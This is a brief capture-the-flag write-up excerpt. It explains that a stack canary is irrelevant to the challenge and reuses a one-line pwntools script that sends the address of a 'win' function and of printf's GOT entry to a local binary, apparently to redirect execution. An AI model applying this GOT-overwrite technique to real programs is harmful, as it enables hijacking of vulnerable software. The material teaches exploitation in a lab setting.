This challenge really is the same. There's a canary, but since we're not overflowing a buffer, it doesn't matter. We can use the identical exploit script to solve this one:
from pwn import * elf = context.binary = ELF("./chall") p = process() p.sendline(str(elf.sym.win).encode()) p.sendline(str(elf.got.printf).encode()) p.interactive()
